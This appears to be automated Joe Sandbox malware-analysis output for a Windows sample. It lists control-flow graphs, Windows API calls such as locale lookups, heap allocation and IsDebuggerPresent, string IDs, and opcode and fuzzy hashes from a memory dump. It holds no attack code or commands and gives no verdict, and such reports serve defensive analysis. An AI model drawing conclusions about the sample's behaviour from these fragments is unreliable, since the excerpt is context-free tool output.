                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                  • Opcode ID: c2282726b0b5cf086995f808df833536bfbab8004f003a954e557579bd6f0212
                                                                                                                                                                                                                                                                  • Instruction ID: cca51844c99d1c69a1d982e7755d1170c7ebdde565874ed260ef6bf2efca7a1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2282726b0b5cf086995f808df833536bfbab8004f003a954e557579bd6f0212
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5111903560475146C730DA3E8CE8B726A96EF56370B38075ED1B7C76F1CF24E8829285

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 234 6c4607-6c4616 call 6c3b8b 237 6c463f-6c4659 call 633dd7 LCMapStringW 234->237 238 6c4618-6c463d LCMapStringEx 234->238 242 6c465f-6c4661 237->242 238->242
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNELBASE(?,006C9ED3,?,?,00000000,?,00000000,00000000,00000000), ref: 006C463B
                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 006C4659
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                  • Opcode ID: 499698e0aefa020cb23a922ee172f453f4f2eb5a2a677407b2ea0dd2f2edc347
                                                                                                                                                                                                                                                                  • Instruction ID: 6ff32abcf5cf9eb93cedc90174f68e1b38d409e93bdc890859a876f75bdc22c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499698e0aefa020cb23a922ee172f453f4f2eb5a2a677407b2ea0dd2f2edc347
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF07A3640011ABBCF16AF91DC05EEE3F26EF49360F058019FA1825130CB36C932EB95

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 339 689296-6892ad GetLastError 340 6892ba 339->340 341 6892af-6892b8 339->341 342 6892bd-6892c2 call 63163b 340->342 341->342 344 6892c7-6892db SetLastError 342->344
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,006895AC), ref: 006892A0
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?), ref: 006892D0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7d8d063effe41a6d38056624e1e4f7362efdc9183b3e76beafc1a27cabb056b7
                                                                                                                                                                                                                                                                  • Instruction ID: cb86729dbcff1238131e3e8f84a8156e7938ede7e71ed740f4c7a65b2fbb22cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d8d063effe41a6d38056624e1e4f7362efdc9183b3e76beafc1a27cabb056b7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF08CB2504205FFCB009BA9D909A8AFBE9EB56350F24865AF005C3610EBB5EA01C7E4

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  control_flow_graph 345 6c35b5-6c35c0 346 6c35ce-6c35d4 345->346 347 6c35c2-6c35cc 345->347 349 6c35ed-6c35fe RtlAllocateHeap 346->349 350 6c35d6-6c35d7 346->350 347->346 348 6c3602-6c360d call 633bbb 347->348 354 6c360f-6c3611 348->354 351 6c35d9-6c35e0 call 634ae8 349->351 352 6c3600 349->352 350->349 351->348 358 6c35e2-6c35eb call 634345 351->358 352->354 358->348 358->349
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 006C35F6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 77e2d82cd8331cd50e830bf9367826e4c69cfb0ba0930dfe57b2c3de9c4347d2
                                                                                                                                                                                                                                                                  • Instruction ID: 5e71e5e56071fa128e549d93318326c4d8fd45d59e19bfa9c6d474a9b197ad67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77e2d82cd8331cd50e830bf9367826e4c69cfb0ba0930dfe57b2c3de9c4347d2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3F0B4316042347B9B615A239C02FBB7B8BEF41760B55C01EF8059B390CF20DE0186E8
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 006D58A3
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 006D58CC
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006D58E1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                  • Opcode ID: 0f27ba9c4623ac7d0d789748e2fd4397054289dc9165247dcbbb0d4beb4542f3
                                                                                                                                                                                                                                                                  • Instruction ID: d8d8018b1c74c13e78c09262475132cadd20f2f5dd6748b5323622d7fb9822d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f27ba9c4623ac7d0d789748e2fd4397054289dc9165247dcbbb0d4beb4542f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821B332E00925ABDB389F14C941AE777A7EF50B50B568426E90BD7B10EB32DD41E350
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 006D5B5F
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006D5BA8
                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 006D5BB7
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 006D5BFF
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 006D5C1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3475089800-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9defa09d41cc6d4712f40fee4ef471dc3b96de5e76ddf96a023286cea6a2fcd5
                                                                                                                                                                                                                                                                  • Instruction ID: 17d76494246ad8c28a83b8c2aff352eafe741db9b34a9d6ae81501c3656bc0a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9defa09d41cc6d4712f40fee4ef471dc3b96de5e76ddf96a023286cea6a2fcd5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE517171E00A099FDB10DFA5CC91AFA77BAAF48700F18446BE512EB791E7709A04CB64
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                  • API String ID: 0-2761157908
                                                                                                                                                                                                                                                                  • Opcode ID: adf9c4f2041852f0d0bc4decdd1d849b3ad7bedf165aa779f9a0b340623f2351
                                                                                                                                                                                                                                                                  • Instruction ID: 1d6827c9afc00303b6c97c9ef853b9e057b28a3afcf52a9b9e534458b710ddaa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adf9c4f2041852f0d0bc4decdd1d849b3ad7bedf165aa779f9a0b340623f2351
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D20571E082298BDB65DE28DC40BEAB7BAEB45314F1441EAD40DE7340E778AE85CF41
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006D4F38
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006D4F63
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 006D5144
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                  • API String ID: 790303815-905460609
                                                                                                                                                                                                                                                                  • Opcode ID: 05003210c203f3bc2eaac88360613f4f574d8c39013f3db340858f651c94813a
                                                                                                                                                                                                                                                                  • Instruction ID: cf2cfc6148ba1d42e0accd9711c7c7e60763315022fe03e5d84037ba02852d25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05003210c203f3bc2eaac88360613f4f574d8c39013f3db340858f651c94813a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2271D371E00606ABDB24AB35CC46BBA73AAEF49300F14446BF506D7781EFB5ED4186E4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: <o$ <o$(<o$/
                                                                                                                                                                                                                                                                  • API String ID: 0-3407706917
                                                                                                                                                                                                                                                                  • Opcode ID: 932258d76e93dbdda046e4122ae974754d7741c7137f003d47dd24dcaed30c86
                                                                                                                                                                                                                                                                  • Instruction ID: c67ad064a7d924631fc1cb4939ad5d1e60bc13f2c063bdb16de270f942fe2e7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 932258d76e93dbdda046e4122ae974754d7741c7137f003d47dd24dcaed30c86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C79273B2E106199BDB14EFA8CC95BED77BAAB15300F04423DF512EB380DB68D949CB54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 006CFEE2
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 006CFF5D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006CFF7F
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 006CFFA2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1164774033-0
                                                                                                                                                                                                                                                                  • Opcode ID: d944d28bfeb0656e0c0d9fd98cbf0830bbde4a0e6b2dd7457144b39ada1b47cf
                                                                                                                                                                                                                                                                  • Instruction ID: a99423611a51027c6721aa3d281f325b725769bd85db0ae78894385ac51e5f0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d944d28bfeb0656e0c0d9fd98cbf0830bbde4a0e6b2dd7457144b39ada1b47cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3419671901119AFDB20DFA9DC89EFAB7BBEB85304F1481AEE415D7241E7309E84CB54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006785C8
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00678694
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006786AD
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 006786B7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                                  • Opcode ID: 47110ae9a66dda6127158a48523aef3693f7b89baaf3f7d713f5f948f07ba554
                                                                                                                                                                                                                                                                  • Instruction ID: 1961bfdde2215dbbe432ede0add63a963c3537f8ddba54447d139887e6009dd0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47110ae9a66dda6127158a48523aef3693f7b89baaf3f7d713f5f948f07ba554
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931F875D052189BDF60DFA4D9497CDBBB8BF08300F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 0064F2C9
                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 0064F2F0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                  • Opcode ID: 66555d4c9a1f1ce9aecb538520244531b14756d276b50d40b50f1b6f3b54c1da
                                                                                                                                                                                                                                                                  • Instruction ID: 43815c6423e0c4b9a545ec0975c214c295f42110f385fc896c9ced8688269f44
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66555d4c9a1f1ce9aecb538520244531b14756d276b50d40b50f1b6f3b54c1da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F03079215108FFEB189BD4CC0ADEB76AEEF09394F108429FA01DA150E7B1AF0097B4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D5404
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D544E
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 006D5514
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                  • Opcode ID: d20328bc1f8c9430a025dfa63717374f81fec8c7c40a7dfdbca2a9bed8f1d36d
                                                                                                                                                                                                                                                                  • Instruction ID: bbf380fb25fc1a966a76f4a9a01de2fecd7409db220245f936ef352bd63c4a29
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20328bc1f8c9430a025dfa63717374f81fec8c7c40a7dfdbca2a9bed8f1d36d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3161A1719106179FDB299F24DC82BBA77AAEF04311F10407BE906C6B85FB34D991DB50
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0068945D
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00689467
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00689474
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e060aade8aa77cd28e81617ed63268bc3c54e7a83443058199750a682267232
                                                                                                                                                                                                                                                                  • Instruction ID: d8b90081f868652bed7790abeb21216ab3e01f2ac30dd72b4b7aabd47e89ff72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e060aade8aa77cd28e81617ed63268bc3c54e7a83443058199750a682267232
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D31D474901228ABCB61DF64D8887DDBBB4BF08310F5042DAE41DA72A0E7349B858F54
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0495adc51b3431ffd0a8f443fbdf3208633184adcf96cdde2d67cf055e1c6562
                                                                                                                                                                                                                                                                  • Instruction ID: f756877d6c5f9c2c2dd6e6617128d93018e1fe0f5493f26860d528c5ac878076
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0495adc51b3431ffd0a8f443fbdf3208633184adcf96cdde2d67cf055e1c6562
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA51B475904219AFDB24DFA9CC89EFABBBAEF45304F1441ADF409D3201EA319E408F54
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 006CB926
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1e67d887677cce5557c76dc5348d49f471b00e19ac393bd4d1ffcedafc45933e
                                                                                                                                                                                                                                                                  • Instruction ID: 2d5851caa205f38b564ae4d3a40405b2ab069a6839c25d508c42aa1d8e0e40de
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e67d887677cce5557c76dc5348d49f471b00e19ac393bd4d1ffcedafc45933e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93B13731610608DFDB14CF28C486FA57BA2FF45365F29965CE99ACF2A1C335E982CB40
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00677D2D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                  • Opcode ID: be38cfdb32769b2bcc4bf158e2c49bca05bff23b353a2611d0dae71c22702c5f
                                                                                                                                                                                                                                                                  • Instruction ID: c292c982955412dae751fe558b21ce27532a5f8c6e497f24793e80793a6e5acc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be38cfdb32769b2bcc4bf158e2c49bca05bff23b353a2611d0dae71c22702c5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B45188B5A046099FEB25CF64D8816AEBBF1FB49300F24C4ABE409EB351D3789D41CB54
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 7fcd4e0e66000d7c89cce3d798c147d744c637bd076a4f17c0608046c6fe111c
                                                                                                                                                                                                                                                                  • Instruction ID: e895c9fc908b18a25e08ec982dfcd823fc5ac0ccc98ec6d0067849733d197a6e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fcd4e0e66000d7c89cce3d798c147d744c637bd076a4f17c0608046c6fe111c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE1BBB06006058FEB24CF68C190AEFBBB2FF49714B248A4DD4969B391D731AD86CB55
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 54a6f3ac149c63b179cd1198fd8b3f65597ccb6cdee5e7a688825deba8ff928f
                                                                                                                                                                                                                                                                  • Instruction ID: d34ae8c88c6eb43e3e5428178ffad34e2ad1a3c50e31706e83aec832102a2eb6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54a6f3ac149c63b179cd1198fd8b3f65597ccb6cdee5e7a688825deba8ff928f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE19CB4A006058FEB24DF68C590AEBBBF2FF49310F24965DD4569B392D730AD82CB51
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 3cc1b6b788d65978f59a434d8b357a5e5ac0c58e81d3987aac4a9288cea2ce52
                                                                                                                                                                                                                                                                  • Instruction ID: 3f914d36ad418b308a590683028e35edb2d9f51013b47e11695ee78b6e24b67a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cc1b6b788d65978f59a434d8b357a5e5ac0c58e81d3987aac4a9288cea2ce52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE1AAB0A00605AFCB24DF68C5A0AEAB7F3AF46310FA4861DD5569F391D730ADC2CB55
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: b5f20149caf2266c41ad0c5a3b2434b142980e6555ce753f44629b375cb8144c
                                                                                                                                                                                                                                                                  • Instruction ID: 513863b5e9e72fe6a92a76d21828e6bcf04669db42e93f0b5b992bd9c6ffb5b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5f20149caf2266c41ad0c5a3b2434b142980e6555ce753f44629b375cb8144c
